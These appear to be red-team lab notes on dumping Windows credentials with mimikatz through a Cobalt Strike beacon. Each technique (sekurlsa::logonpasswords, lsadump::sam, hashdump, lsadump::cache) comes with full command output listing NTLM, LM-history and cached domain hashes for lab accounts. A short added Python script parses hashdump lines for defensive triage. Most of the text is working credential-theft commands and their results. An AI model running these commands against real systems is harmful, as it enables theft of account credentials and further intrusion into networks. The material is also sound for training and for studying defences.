Extract passwords from memory (only NTLM hashes if WDigest is not enabled)
mimikatz sekurlsa::logonpasswords
Example:
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
Authentication Id : 0 ; 120928801 (00000000:07353a21)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 01/02/2021 04:26:49
SID : S-1-5-18
msv :
[00000003] Primary
* Username : n.lamb
* Domain : CYBER
* NTLM : 2e8a408a8aec852ef2e458b938b8c071
tspkg :
wdigest :
* Username : n.lamb
* Domain : CYBER
* Password : (null)
kerberos :
* Username : n.lamb
* Domain : CYBERBOTIC.IO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 119083790 (00000000:0719130e)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 01/02/2021 02:27:19
SID : S-1-5-18
msv :
[00000003] Primary
* Username : n.lamb
* Domain : CYBER
* NTLM : 2e8a408a8aec852ef2e458b938b8c071
tspkg :
wdigest :
* Username : n.lamb
* Domain : CYBER
* Password : (null)
kerberos :
* Username : n.lamb
* Domain : CYBERBOTIC.IO
* Password : (null)
ssp :
credman :
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts.
mimikatz token::elevate lsadump::sam
Example #1:
beacon> mimikatz lsadump::sam
[*] Tasked beacon to run mimikatz's lsadump::sam command
[+] host called home, sent: 750702 bytes
[+] received output:
Domain : WKSTN-3721
SysKey : be08d37d98bf4c887336ad0fda4cf163
Local SID : S-1-5-21-3044885426-1600074939-3914761197
SAMKey : 499d771b080645b0a04059056e182b12
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3ccc9a591f4fc162554b5aa53b0b2dcf
lm - 0: 2d85c588802929e7d3128e4bf9e312a3
lm - 1: 64d505ed3aba219d8088edd3967dcb2f
lm - 2: fad21760db14726a453e378f407ba20b
lm - 3: e7e2c92cae356e50d2361c7867668b5d
ntlm- 0: 3ccc9a591f4fc162554b5aa53b0b2dcf
ntlm- 1: 70b3ca1d0563173e87bd9b48d06af72d
ntlm- 2: e45b4697dd95e2ff83ead4b51e9df62b
ntlm- 3: e344ea8c820f91ae3212a9de26aedf92
ntlm- 4: fc525c9683e8fe067095ba2ddc971889
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
Example #2:
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ccc9a591f4fc162554b5aa53b0b2dcf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
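The pwdump-style lines above can be triaged once a SAM exposure is known. The following is an added example written for these notes, not Cobalt Strike or mimikatz code: the sample input is constructed from the hashdump output above, and the empty LM/NT hash constants are public, well-known values.

```python
from collections import namedtuple

# Well-known constants (public knowledge): the LM field holds this value when LM
# hash storage is disabled; the NT value is the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "Guest", 503: "DefaultAccount"}
SamEntry = namedtuple("SamEntry", "user rid lm_hash nt_hash")

# Constructed sample: the three lines from the hashdump output above.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ccc9a591f4fc162554b5aa53b0b2dcf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines; blank or malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append(SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries

def triage(entries):
    """Map each user to the findings a defender acts on after the SAM was exposed."""
    findings, by_nt = {}, {}
    for e in entries:
        notes = []
        if e.lm_hash != EMPTY_LM:
            notes.append("LM hash stored (NoLMHash not enforced)")
        if e.nt_hash == EMPTY_NT:
            notes.append("blank password (confirm the account is disabled)")
        elif e.rid in WELL_KNOWN_RIDS:
            notes.append(f"{WELL_KNOWN_RIDS[e.rid]} password is now exposed: rotate it")
        by_nt.setdefault(e.nt_hash, []).append(e.user)
        findings[e.user] = notes
    # Identical NT hashes mean identical passwords: reuse across local accounts.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                findings[u].append("password shared with " + ", ".join(x for x in users if x != u))
    return findings
```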
Domain credentials can be required for logon even while the device is disconnected from the domain: the local device caches the domain credentials so that authentication can happen locally.
mimikatz token::elevate lsadump::cache
Example:
beacon> mimikatz lsadump::cache
[*] Tasked beacon to run mimikatz's lsadump::cache command
[+] host called home, sent: 750704 bytes
[+] received output:
Domain : WKSTN-3721
SysKey : be08d37d98bf4c887336ad0fda4cf163
Local name : WKSTN-3721 ( S-1-5-21-3044885426-1600074939-3914761197 )
Domain name : CYBER ( S-1-5-21-3865823697-1816233505-1834004910 )
Domain FQDN : cyberbotic.io
Policy subsystem is : 1.14
LSA Key(s) : 1, default {b8ea07d8-963c-032a-0732-1f246a07ee91}
[00] {b8ea07d8-963c-032a-0732-1f246a07ee91} edb7feaad803dd5332009dbf7906265a76388463c007a9ac2b4a7a94e973fe40
* Iteration is set to default (10240)
[NL$1 - 26/01/2021 14:53:28]
RID : 00000472 (1138)
User : CYBER\r.mckenzie
MsCacheV2 : c642feecc525e3844c89b5ed0f10a8dc
[NL$2 - 24/01/2021 22:01:26]
RID : 0000046e (1134)
User : CYBER\p.burke
MsCacheV2 : d5e65284f217d4f5b0d087e07eb7680c
[NL$3 - 03/06/2020 12:19:17]
RID : 0000046f (1135)
User : CYBER\n.lamb
MsCacheV2 : 3c7879b370351f7a572db34ebe473b25
[NL$4 - 26/01/2021 14:50:14]
RID : 00000473 (1139)
User : CYBER\s.owen
MsCacheV2 : db356007452a9efdb3b383b9a205f100
[NL$5 - 01/02/2021 01:42:03]
RID : 00000464 (1124)
User : CYBER\n.glover
MsCacheV2 : 60f2e7aff0a8e4574caa53687fb3dbd5